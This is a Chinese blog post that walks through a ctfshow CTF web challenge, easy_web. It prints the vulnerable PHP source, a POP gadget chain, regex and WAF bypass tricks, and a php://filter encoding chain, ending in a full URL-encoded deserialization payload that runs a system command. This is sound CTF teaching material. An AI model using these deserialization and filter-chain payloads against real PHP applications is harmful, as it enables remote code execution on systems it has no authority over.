- 1Stable Diffusion WebUI API http://127.0.0.1:7860/docs空白_stable diffusion127.0.0.1
- 2Web前端设计基础测试_javascript功能强大,主要表现在
- 3uni-app 使用 tailwindcss_uniapp tailwindcss
- 4shiro1.2.4升级报错 org/owasp/encoder/Encode或者是org.owasp.encoder.Encode
- 5AI 预测蛋白质结构「GitHub 热点速览 v.21.29」
- 6如何解决移动硬盘在mac上只读不写 macbook无法显示移动硬盘_macbook插入移动硬盘是只读怎么拷贝出去
- 7[C/C++]函数重载,三连问,你会吗?_previously defined here
- 8【CNN】LeNet——卷积神经网络的开山鼻祖_最初的卷积神经网络模型
- 9MySql优化——索引优化与查询优化(2) 关联查询优化_mysql 连表查询数量优化
- 10Go 之 工具库 samber/lo_go 类似 lodash的
ctfshow元旦水友赛 easy_web(进一步解释)
赞
踩
前言
刷题时看到有大佬已经有wp了,但其中有些东西并不能让我很好的理解,特写一篇文章来补全一下
大佬wp
#预期解法
源码
开胃小菜,就让我成为签到题叭 <?php header('Content-Type:text/html;charset=utf-8'); error_reporting(0); function waf1($Chu0){ foreach ($Chu0 as $name => $value) { if(preg_match('/[a-z]/i', $value)){ exit("waf1"); } } } function waf2($Chu0){ if(preg_match('/show/i', $Chu0)) exit("waf2"); } function waf_in_waf_php($a){ $count = substr_count($a,'base64'); echo "hinthinthint,base64喔"."<br>"; if($count!=1){ return True; } if (preg_match('/ucs-2|phar|data|input|zip|flag|\%/i',$a)){ return True; }else{ return false; } } class ctf{ public $h1; public $h2; public function __wakeup(){ throw new Exception("fastfast"); } public function __destruct() { $this->h1->nonono($this->h2); } } class show{ public function __call($name,$args){ if(preg_match('/ctf/i',$args[0][0][2])){ echo "gogogo"; } } } class Chu0_write{ public $chu0; public $chu1; public $cmd; public function __construct(){ $this->chu0 = 'xiuxiuxiu'; } public function __toString(){ echo "__toString"."<br>"; if ($this->chu0===$this->chu1){ $content='ctfshowshowshowwww'.$_GET['chu0']; if (!waf_in_waf_php($_GET['name'])){ file_put_contents($_GET['name'].".txt",$content); }else{ echo "绕一下吧孩子"; } $tmp = file_get_contents('ctfw.txt'); echo $tmp."<br>"; if (!preg_match("/f|l|a|g|x|\*|\?|\[|\]| |\'|\<|\>|\%/i",$_GET['cmd'])){ eval($tmp($_GET['cmd'])); }else{ echo "waf!"; } file_put_contents("ctfw.txt",""); } return "Go on"; } } if (!$_GET['show_show.show']){ echo "开胃小菜,就让我成为签到题叭"; highlight_file(__FILE__); }else{ echo "WAF,启动!"; waf1($_REQUEST); waf2($_SERVER['QUERY_STRING']); if (!preg_match('/^[Oa]:[\d]/i',$_GET['show_show.show'])){ unserialize($_GET['show_show.show']); }else{ echo "被waf啦"; } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
流程
waf1()->waf2()->正则->ctf() __destruct -> show() __call -> Chu0_write __toString(){waf_in_waf_php()}
构建pop链
<?php class ctf{ public $h1; public $h2; } class show{ } class Chu0_write{ public $chu0; public $chu1; public $cmd; } $a=new ctf(); $a->h1=new show(); $a->h2=[[2=>new Chu0_write()]]; //注意这里的参数是ctf()的h2 //__call($name,$args)中的$args已经是一个数组,所h2只用嵌套两层即可 echo serialize($a);
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
得到pop链
O:3:"ctf":2:{s:2:"h1";O:4:"show":0:{}s:2:"h2";a:1:{i:0;a:1:{i:2;O:10:"Chu0_write":3:{s:4:"chu0";N;s:4:"chu1";N;s:3:"cmd";N;}}}}
- 1
要绕过其正则
preg_match('/^[Oa]:[\d]/i',$_GET['show_show.show']
- 1
则最终pop链为
O:+3:"ctf":2:{s:2:"h1";O:4:"show":0:{}s:2:"h2";a:1:{i:0;a:1:{i:2;O:10:"Chu0_write":3:{s:4:"chu0";N;s:4:"chu1";N;s:3:"cmd";N;}}}}
- 1
waf1就是我们传递的参数值中不能含有a-z和A-Z,这里有个知识点,就是$_REQUEST的传参中POST的优先级比GET高,我们可以POST复制传递题目让我们GET的参数,waf1就会匹配POST的数据而忽略GET,从而绕过
waf2让我们GET传参中不能有show出现,可以用URL加密进行绕过,在传参规则中show_show.shwo不能允许所以改成show[show.show
所以传参
GET:?%73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77=%4f:%2b%33:%22%63%74%66%22:%32:%7b%73:%32:%22%68%31%22%3b%4f:%34:%22%73%68%6f%77%22:%30:%7b%7d%73:%32:%22%68%32%22%3b%61:%31:%7b%69:%30%3b%61:%31:%7b%69:%32%3b%4f:%31%30:%22%43%68%75%30%5f%77%72%69%74%65%22:%33:%7b%73:%34:%22%63%68%75%30%22%3b%4e%3b%73:%34:%22%63%68%75%31%22%3b%4e%3b%73:%33:%22%63%6d%64%22%3b%4e%3b%7d%7d%7d
POST:show[show.show=1
这样到了tostring下面
这里主要是用了php://filter的具体的思路还是看大佬的wp
主要修改一下其加密的方式
<?php
$text = "system";
$base64_text = base64_encode($text);
$myarray = str_split($base64_text, 1);
$s=implode("\x00", $myarray)."\x00";//为了不造成传参中出现两个=,对其前后都加上/x00,且并不会对之后的base64解码造成影响
$quoted_printable = quoted_printable_encode($s);
echo $quoted_printable;
?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
所以最终payload
GET:?%73%68%6f%77[%73%68%6f%77.%73%68%6f%77=%43%3a%31%31%3a%22%41%72%72%61%79%4f%62%6a%65%63%74%22%3a%31%36%34%3a%7b%78%3a%69%3a%30%3b%61%3a%31%3a%7b%73%3a%39%3a%22%67%78%6e%67%78%6e%67%78%6e%22%3b%4f%3a%33%3a%22%63%74%66%22%3a%32%3a%7b%73%3a%32%3a%22%68%31%22%3b%4f%3a%34%3a%22%73%68%6f%77%22%3a%30%3a%7b%7d%73%3a%32%3a%22%68%32%22%3b%61%3a%31%3a%7b%69%3a%30%3b%61%3a%31%3a%7b%69%3a%32%3b%4f%3a%31%30%3a%22%43%68%75%30%5f%77%72%69%74%65%22%3a%33%3a%7b%73%3a%34%3a%22%63%68%75%30%22%3b%4e%3b%73%3a%34%3a%22%63%68%75%31%22%3b%4e%3b%73%3a%33%3a%22%63%6d%64%22%3b%4e%3b%7d%7d%7d%7d%7d%3b%6d%3a%61%3a%30%3a%7b%7d%7d&name=php://filter/convert.quoted-printable-decode/convert.iconv.utf-16.utf-8/convert.base64-decode/resource=ctfw&chu0=c=003=00l=00z=00d=00G=00V=00t=00&cmd=env
POST:show[show.show=1&name=1&chu0=1&cmd=1
后言
这篇博客是看了大佬的wp后进行的进一步解释,所以会有很多相同之处。如有侵犯请联系我(立马删除)最后再次推荐一下大佬的wp
- 0x01 WEB_你取吧题目源码[详细] -->
赞
踩
